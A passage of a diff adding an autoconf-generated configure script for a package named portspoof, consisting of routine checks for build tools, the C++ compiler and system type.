;; + esac +fi +# Use eval to expand $SHELL +if eval "$MISSING --run true"; then + am_missing_run="$MISSING --run " +else + am_missing_run= + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: \`missing' script is too old or missing" >&5 +$as_echo "$as_me: WARNING: \`missing' script is too old or missing" >&2;} +fi + +if test x"${install_sh}" != xset; then + case $am_aux_dir in + *\ * | *\ *) + install_sh="\${SHELL} '$am_aux_dir/install-sh'" ;; + *) + install_sh="\${SHELL} $am_aux_dir/install-sh" + esac +fi + +# Installed binaries are usually stripped using `strip' when the user +# run `make install-strip'. However `strip' might not be the right +# tool to use in cross-compilation environments, therefore Automake +# will honor the `STRIP' environment variable to overrule this program. +if test "$cross_compiling" != no; then + if test -n "$ac_tool_prefix"; then + # Extract the first word of "${ac_tool_prefix}strip", so it can be a program name with args. +set dummy ${ac_tool_prefix}strip; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_STRIP+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$STRIP"; then + ac_cv_prog_STRIP="$STRIP" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_STRIP="${ac_tool_prefix}strip" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +STRIP=$ac_cv_prog_STRIP +if test -n "$STRIP"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $STRIP" >&5 +$as_echo "$STRIP" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + +fi +if test -z "$ac_cv_prog_STRIP"; then + ac_ct_STRIP=$STRIP + # Extract the first word of "strip", so it can be a program name with args. +set dummy strip; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_ac_ct_STRIP+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$ac_ct_STRIP"; then + ac_cv_prog_ac_ct_STRIP="$ac_ct_STRIP" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_ac_ct_STRIP="strip" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +ac_ct_STRIP=$ac_cv_prog_ac_ct_STRIP +if test -n "$ac_ct_STRIP"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_STRIP" >&5 +$as_echo "$ac_ct_STRIP" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + if test "x$ac_ct_STRIP" = x; then + STRIP=":" + else + case $cross_compiling:$ac_tool_warned in +yes:) +{ $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 +$as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} +ac_tool_warned=yes ;; +esac + STRIP=$ac_ct_STRIP + fi +else + STRIP="$ac_cv_prog_STRIP" +fi + +fi +INSTALL_STRIP_PROGRAM="\$(install_sh) -c -s" + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for a thread-safe mkdir -p" >&5 +$as_echo_n "checking for a thread-safe mkdir -p... " >&6; } +if test -z "$MKDIR_P"; then + if test "${ac_cv_path_mkdir+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH$PATH_SEPARATOR/opt/sfw/bin +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_prog in mkdir gmkdir; do + for ac_exec_ext in '' $ac_executable_extensions; do + { test -f "$as_dir/$ac_prog$ac_exec_ext" && $as_test_x "$as_dir/$ac_prog$ac_exec_ext"; } || continue + case `"$as_dir/$ac_prog$ac_exec_ext" --version 2>&1` in #( + 'mkdir (GNU coreutils) '* | \ + 'mkdir (coreutils) '* | \ + 'mkdir (fileutils) '4.1*) + ac_cv_path_mkdir=$as_dir/$ac_prog$ac_exec_ext + break 3;; + esac + done + done + done +IFS=$as_save_IFS + +fi + + test -d ./--version && rmdir ./--version + if test "${ac_cv_path_mkdir+set}" = set; then + MKDIR_P="$ac_cv_path_mkdir -p" + else + # As a last resort, use the slow shell script. Don't cache a + # value for MKDIR_P within a source directory, because that will + # break other packages using the cache if that directory is + # removed, or if the value is a relative name. + MKDIR_P="$ac_install_sh -d" + fi +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $MKDIR_P" >&5 +$as_echo "$MKDIR_P" >&6; } + +mkdir_p="$MKDIR_P" +case $mkdir_p in + [\\/$]* | ?:[\\/]*) ;; + */*) mkdir_p="\$(top_builddir)/$mkdir_p" ;; +esac + +for ac_prog in gawk mawk nawk awk +do + # Extract the first word of "$ac_prog", so it can be a program name with args. +set dummy $ac_prog; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_AWK+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$AWK"; then + ac_cv_prog_AWK="$AWK" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_AWK="$ac_prog" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +AWK=$ac_cv_prog_AWK +if test -n "$AWK"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $AWK" >&5 +$as_echo "$AWK" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + + test -n "$AWK" && break +done + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether ${MAKE-make} sets \$(MAKE)" >&5 +$as_echo_n "checking whether ${MAKE-make} sets \$(MAKE)... " >&6; } +set x ${MAKE-make} +ac_make=`$as_echo "$2" | sed 's/+/p/g; s/[^a-zA-Z0-9_]/_/g'` +if { as_var=ac_cv_prog_make_${ac_make}_set; eval "test \"\${$as_var+set}\" = set"; }; then : + $as_echo_n "(cached) " >&6 +else + cat >conftest.make <<\_ACEOF +SHELL = /bin/sh +all: + @echo '@@@%%%=$(MAKE)=@@@%%%' +_ACEOF +# GNU make sometimes prints "make[1]: Entering...", which would confuse us. +case `${MAKE-make} -f conftest.make 2>/dev/null` in + *@@@%%%=?*=@@@%%%*) + eval ac_cv_prog_make_${ac_make}_set=yes;; + *) + eval ac_cv_prog_make_${ac_make}_set=no;; +esac +rm -f conftest.make +fi +if eval test \$ac_cv_prog_make_${ac_make}_set = yes; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 +$as_echo "yes" >&6; } + SET_MAKE= +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } + SET_MAKE="MAKE=${MAKE-make}" +fi + +rm -rf .tst 2>/dev/null +mkdir .tst 2>/dev/null +if test -d .tst; then + am__leading_dot=. +else + am__leading_dot=_ +fi +rmdir .tst 2>/dev/null + +if test "`cd $srcdir && pwd`" != "`pwd`"; then + # Use -I$(srcdir) only when $(srcdir) != ., so that make's output + # is not polluted with repeated "-I." + am__isrc=' -I$(srcdir)' + # test to see if srcdir already configured + if test -f $srcdir/config.status; then + as_fn_error "source directory already configured; run \"make distclean\" there first" "$LINENO" 5 + fi +fi + +# test whether we have cygpath +if test -z "$CYGPATH_W"; then + if (cygpath --version) >/dev/null 2>/dev/null; then + CYGPATH_W='cygpath -w' + else + CYGPATH_W=echo + fi +fi + + +# Define the identity of the package. + PACKAGE=portspoof + VERSION=1.0 + + +cat >>confdefs.h <<_ACEOF +@%:@define PACKAGE "$PACKAGE" +_ACEOF + + +cat >>confdefs.h <<_ACEOF +@%:@define VERSION "$VERSION" +_ACEOF + +# Some tools Automake needs. + +ACLOCAL=${ACLOCAL-"${am_missing_run}aclocal-${am__api_version}"} + + +AUTOCONF=${AUTOCONF-"${am_missing_run}autoconf"} + + +AUTOMAKE=${AUTOMAKE-"${am_missing_run}automake-${am__api_version}"} + + +AUTOHEADER=${AUTOHEADER-"${am_missing_run}autoheader"} + + +MAKEINFO=${MAKEINFO-"${am_missing_run}makeinfo"} + +# We need awk for the "check" target. The system "awk" is bad on +# some platforms. +# Always define AMTAR for backward compatibility. + +AMTAR=${AMTAR-"${am_missing_run}tar"} + +am__tar='${AMTAR} chof - "$$tardir"'; am__untar='${AMTAR} xf -' + + + + + + +ac_config_headers="$ac_config_headers src/config.h" + + +$as_echo "@%:@define _GNU_SOURCE 1" >>confdefs.h + + +UNAME=`uname` + +# Make sure we can run config.sub. +$SHELL "$ac_aux_dir/config.sub" sun4 >/dev/null 2>&1 || + as_fn_error "cannot run $SHELL $ac_aux_dir/config.sub" "$LINENO" 5 + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking build system type" >&5 +$as_echo_n "checking build system type... " >&6; } +if test "${ac_cv_build+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + ac_build_alias=$build_alias +test "x$ac_build_alias" = x && + ac_build_alias=`$SHELL "$ac_aux_dir/config.guess"` +test "x$ac_build_alias" = x && + as_fn_error "cannot guess build type; you must specify one" "$LINENO" 5 +ac_cv_build=`$SHELL "$ac_aux_dir/config.sub" $ac_build_alias` || + as_fn_error "$SHELL $ac_aux_dir/config.sub $ac_build_alias failed" "$LINENO" 5 + +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_build" >&5 +$as_echo "$ac_cv_build" >&6; } +case $ac_cv_build in +*-*-*) ;; +*) as_fn_error "invalid value of canonical build" "$LINENO" 5;; +esac +build=$ac_cv_build +ac_save_IFS=$IFS; IFS='-' +set x $ac_cv_build +shift +build_cpu=$1 +build_vendor=$2 +shift; shift +# Remember, the first character of IFS is used to create $*, +# except with old shells: +build_os=$* +IFS=$ac_save_IFS +case $build_os in *\ *) build_os=`echo "$build_os" | sed 's/ /-/g'`;; esac + + +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking host system type" >&5 +$as_echo_n "checking host system type... " >&6; } +if test "${ac_cv_host+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test "x$host_alias" = x; then + ac_cv_host=$ac_cv_build +else + ac_cv_host=`$SHELL "$ac_aux_dir/config.sub" $host_alias` || + as_fn_error "$SHELL $ac_aux_dir/config.sub $host_alias failed" "$LINENO" 5 +fi + +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_host" >&5 +$as_echo "$ac_cv_host" >&6; } +case $ac_cv_host in +*-*-*) ;; +*) as_fn_error "invalid value of canonical host" "$LINENO" 5;; +esac +host=$ac_cv_host +ac_save_IFS=$IFS; IFS='-' +set x $ac_cv_host +shift +host_cpu=$1 +host_vendor=$2 +shift; shift +# Remember, the first character of IFS is used to create $*, +# except with old shells: +host_os=$* +IFS=$ac_save_IFS +case $host_os in *\ *) host_os=`echo "$host_os" | sed 's/ /-/g'`;; esac + + + + +# Check system type +case "$host_os" in +linux*) + +cat >>confdefs.h <<_ACEOF +@%:@define LINUX 1 +_ACEOF + + ;; +esac + +# Checks for programs. +ac_ext=cpp +ac_cpp='$CXXCPP $CPPFLAGS' +ac_compile='$CXX -c $CXXFLAGS $CPPFLAGS conftest.$ac_ext >&5' +ac_link='$CXX -o conftest$ac_exeext $CXXFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' +ac_compiler_gnu=$ac_cv_cxx_compiler_gnu +if test -z "$CXX"; then + if test -n "$CCC"; then + CXX=$CCC + else + if test -n "$ac_tool_prefix"; then + for ac_prog in g++ c++ gpp aCC CC cxx cc++ cl.exe FCC KCC RCC xlC_r xlC + do + # Extract the first word of "$ac_tool_prefix$ac_prog", so it can be a program name with args. +set dummy $ac_tool_prefix$ac_prog; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_CXX+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$CXX"; then + ac_cv_prog_CXX="$CXX" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_CXX="$ac_tool_prefix$ac_prog" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +CXX=$ac_cv_prog_CXX +if test -n "$CXX"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $CXX" >&5 +$as_echo "$CXX" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + + test -n "$CXX" && break + done +fi +if test -z "$CXX"; then + ac_ct_CXX=$CXX + for ac_prog in g++ c++ gpp aCC CC cxx cc++ cl.exe FCC KCC RCC xlC_r xlC +do + # Extract the first word of "$ac_prog", so it can be a program name with args. +set dummy $ac_prog; ac_word=$2 +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 +$as_echo_n "checking for $ac_word... " >&6; } +if test "${ac_cv_prog_ac_ct_CXX+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + if test -n "$ac_ct_CXX"; then + ac_cv_prog_ac_ct_CXX="$ac_ct_CXX" # Let the user override the test. +else +as_save_IFS=$IFS; IFS=$PATH_SEPARATOR +for as_dir in $PATH +do + IFS=$as_save_IFS + test -z "$as_dir" && as_dir=. + for ac_exec_ext in '' $ac_executable_extensions; do + if { test -f "$as_dir/$ac_word$ac_exec_ext" && $as_test_x "$as_dir/$ac_word$ac_exec_ext"; }; then + ac_cv_prog_ac_ct_CXX="$ac_prog" + $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 + break 2 + fi +done + done +IFS=$as_save_IFS + +fi +fi +ac_ct_CXX=$ac_cv_prog_ac_ct_CXX +if test -n "$ac_ct_CXX"; then + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_CXX" >&5 +$as_echo "$ac_ct_CXX" >&6; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +fi + + + test -n "$ac_ct_CXX" && break +done + + if test "x$ac_ct_CXX" = x; then + CXX="g++" + else + case $cross_compiling:$ac_tool_warned in +yes:) +{ $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 +$as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} +ac_tool_warned=yes ;; +esac + CXX=$ac_ct_CXX + fi +fi + + fi +fi +# Provide some information about the compiler. +$as_echo "$as_me:${as_lineno-$LINENO}: checking for C++ compiler version" >&5 +set X $ac_compile +ac_compiler=$2 +for ac_option in --version -v -V -qversion; do + { { ac_try="$ac_compiler $ac_option >&5" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_compiler $ac_option >&5") 2>conftest.err + ac_status=$? + if test -s conftest.err; then + sed '10a\ +... rest of stderr output deleted ... + 10q' conftest.err >conftest.er1 + cat conftest.er1 >&5 + fi + rm -f conftest.er1 conftest.err + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } +done + +cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ + + ; + return 0; +} +_ACEOF +ac_clean_files_save=$ac_clean_files +ac_clean_files="$ac_clean_files a.out a.out.dSYM a.exe b.out" +# Try to create an executable without -o first, disregard a.out. +# It will help us diagnose broken compilers, and finding out an intuition +# of exeext. +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether the C++ compiler works" >&5 +$as_echo_n "checking whether the C++ compiler works... " >&6; } +ac_link_default=`$as_echo "$ac_link" | sed 's/ -o *conftest[^ ]*//'` + +# The possible output files: +ac_files="a.out conftest.exe conftest a.exe a_out.exe b.out conftest.*" + +ac_rmfiles= +for ac_file in $ac_files +do + case $ac_file in + *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) ;; + * ) ac_rmfiles="$ac_rmfiles $ac_file";; + esac +done +rm -f $ac_rmfiles + +if { { ac_try="$ac_link_default" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_link_default") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; }; then : + # Autoconf-2.13 could set the ac_cv_exeext variable to `no'. +# So ignore a value of `no', otherwise this would lead to `EXEEXT = no' +# in a Makefile. We should not override ac_cv_exeext if it was cached, +# so that the user can short-circuit this test for compilers unknown to +# Autoconf. +for ac_file in $ac_files '' +do + test -f "$ac_file" || continue + case $ac_file in + *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) + ;; + [ab].out ) + # We found the default executable, but exeext='' is most + # certainly right. + break;; + *.* ) + if test "${ac_cv_exeext+set}" = set && test "$ac_cv_exeext" != no; + then :; else + ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'` + fi + # We set ac_cv_exeext here because the later test for it is not + # safe: cross compilers may not add the suffix if given an `-o' + # argument, so we may need to know it at that point already. + # Even if this section looks crufty: it has the advantage of + # actually working. + break;; + * ) + break;; + esac +done +test "$ac_cv_exeext" = no && ac_cv_exeext= + +else + ac_file='' +fi +if test -z "$ac_file"; then : + { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 +$as_echo "no" >&6; } +$as_echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + +{ { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 +$as_echo "$as_me: error: in \`$ac_pwd':" >&2;} +{ as_fn_set_status 77 +as_fn_error "C++ compiler cannot create executables +See \`config.log' for more details." "$LINENO" 5; }; } +else + { $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 +$as_echo "yes" >&6; } +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for C++ compiler default output file name" >&5 +$as_echo_n "checking for C++ compiler default output file name... " >&6; } +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_file" >&5 +$as_echo "$ac_file" >&6; } +ac_exeext=$ac_cv_exeext + +rm -f -r a.out a.out.dSYM a.exe conftest$ac_cv_exeext b.out +ac_clean_files=$ac_clean_files_save +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for suffix of executables" >&5 +$as_echo_n "checking for suffix of executables... " >&6; } +if { { ac_try="$ac_link" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_link") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; }; then : + # If both `conftest.exe' and `conftest' are `present' (well, observable) +# catch `conftest.exe'. For instance with Cygwin, `ls conftest' will +# work properly (i.e., refer to `conftest.exe'), while it won't with +# `rm'. +for ac_file in conftest.exe conftest conftest.*; do + test -f "$ac_file" || continue + case $ac_file in + *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) ;; + *.* ) ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'` + break;; + * ) break;; + esac +done +else + { { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 +$as_echo "$as_me: error: in \`$ac_pwd':" >&2;} +as_fn_error "cannot compute suffix of executables: cannot compile and link +See \`config.log' for more details." "$LINENO" 5; } +fi +rm -f conftest conftest$ac_cv_exeext +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_exeext" >&5 +$as_echo "$ac_cv_exeext" >&6; } + +rm -f conftest.$ac_ext +EXEEXT=$ac_cv_exeext +ac_exeext=$EXEEXT +cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +@%:@include +int +main () +{ +FILE *f = fopen ("conftest.out", "w"); + return ferror (f) || fclose (f) != 0; + + ; + return 0; +} +_ACEOF +ac_clean_files="$ac_clean_files conftest.out" +# Check that the compiler produces executables we can run. If not, either +# the compiler is broken, or we cross compile. +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether we are cross compiling" >&5 +$as_echo_n "checking whether we are cross compiling... " >&6; } +if test "$cross_compiling" != yes; then + { { ac_try="$ac_link" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_link") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } + if { ac_try='./conftest$ac_cv_exeext' + { { case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_try") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; }; }; then + cross_compiling=no + else + if test "$cross_compiling" = maybe; then + cross_compiling=yes + else + { { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 +$as_echo "$as_me: error: in \`$ac_pwd':" >&2;} +as_fn_error "cannot run C++ compiled programs. +If you meant to cross compile, use \`--host'. +See \`config.log' for more details." "$LINENO" 5; } + fi + fi +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $cross_compiling" >&5 +$as_echo "$cross_compiling" >&6; } + +rm -f conftest.$ac_ext conftest$ac_cv_exeext conftest.out +ac_clean_files=$ac_clean_files_save +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for suffix of object files" >&5 +$as_echo_n "checking for suffix of object files... " >&6; } +if test "${ac_cv_objext+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ + + ; + return 0; +} +_ACEOF +rm -f conftest.o conftest.obj +if { { ac_try="$ac_compile" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_compile") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; }; then : + for ac_file in conftest.o conftest.obj conftest.*; do + test -f "$ac_file" || continue; + case $ac_file in + *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM ) ;; + *) ac_cv_objext=`expr "$ac_file" : '.*\.\(.*\)'` + break;; + esac +done +else + $as_echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + +{ { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 +$as_echo "$as_me: error: in \`$ac_pwd':" >&2;} +as_fn_error "cannot compute suffix of object files: cannot compile +See \`config.log' for more details." "$LINENO" 5; } +fi +rm -f conftest.$ac_cv_objext conftest.$ac_ext +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_objext" >&5 +$as_echo "$ac_cv_objext" >&6; } +OBJEXT=$ac_cv_objext +ac_objext=$OBJEXT +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether we are using the GNU C++ compiler" >&5 +$as_echo_n "checking whether we are using the GNU C++ compiler... " >&6; } +if test "${ac_cv_cxx_compiler_gnu+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ +#ifndef __GNUC__ + choke me +#endif + + ; + return 0; +} +_ACEOF +if ac_fn_cxx_try_compile "$LINENO"; then : + ac_compiler_gnu=yes +else + ac_compiler_gnu=no +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +ac_cv_cxx_compiler_gnu=$ac_compiler_gnu + +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_cxx_compiler_gnu" >&5 +$as_echo "$ac_cv_cxx_compiler_gnu" >&6; } +if test $ac_compiler_gnu = yes; then + GXX=yes +else + GXX= +fi +ac_test_CXXFLAGS=${CXXFLAGS+set} +ac_save_CXXFLAGS=$CXXFLAGS +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking whether $CXX accepts -g" >&5 +$as_echo_n "checking whether $CXX accepts -g... " >&6; } +if test "${ac_cv_prog_cxx_g+set}" = set; then : + $as_echo_n "(cached) " >&6 +else + ac_save_cxx_werror_flag=$ac_cxx_werror_flag + ac_cxx_werror_flag=yes + ac_cv_prog_cxx_g=no + CXXFLAGS="-g" + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ + + ; + return 0; +} +_ACEOF +if ac_fn_cxx_try_compile "$LINENO"; then : + ac_cv_prog_cxx_g=yes +else + CXXFLAGS="" + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ + + ; + return 0; +} +_ACEOF +if ac_fn_cxx_try_compile "$LINENO"; then : + +else + ac_cxx_werror_flag=$ac_save_cxx_werror_flag + CXXFLAGS="-g" + cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ + +int +main () +{ + + ; + return 0; +} +_ACEOF +if ac_fn_cxx_try_compile "$LINENO"; then : + ac_cv_prog_cxx_g=yes +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext + ac_cxx_werror_flag=$ac_save_cxx_werror_flag +fi +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_prog_cxx_g" >&5 +$as_echo "$ac_cv_prog_cxx_g" >&6; } +if test "$ac_test_CXXFLAGS" = set; then + CXXFLAGS=$ac_save_CXXFLAGS +elif test $ac_cv_prog_cxx_g = yes; then + if test "$GXX" = yes; then + CXXFLAGS="-g -O2" + else + CXXFLAGS="-g" + fi +else + if test "$GXX" = yes; then + CXXFLAGS="-O2" + else + CXXFLAGS= + fi +fi +ac_ext=c +ac_cpp='$CPP $CPPFLAGS' +ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' +ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' +ac_compiler_gnu=$ac_cv_c_compiler_gnu +DEPDIR="${am__leading_dot}deps" + +ac_config_commands="$ac_config_commands depfiles" + + +am_make=${MAKE-make} +cat > confinc << 'END' +am__doit: + @echo this is the am__doit target +.PHONY: am__doit +END +# If we don't find an include directive, just comment out the code. +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for style of include used by $am_make" >&5 +$as_echo_n "checking for style of include used by $am_make... " >&6; } +am__include="#" +am__quote= +_am_result=none +# First try GNU make style include. +echo "include confinc" > confmf +# Ignore all kinds of additional output from `make'. +case `$am_make -s -f confmf 2> /dev/null` in #( +*the\ am__doit\ target*) + am__include=include + am__quote= + _am_result=GNU + ;; 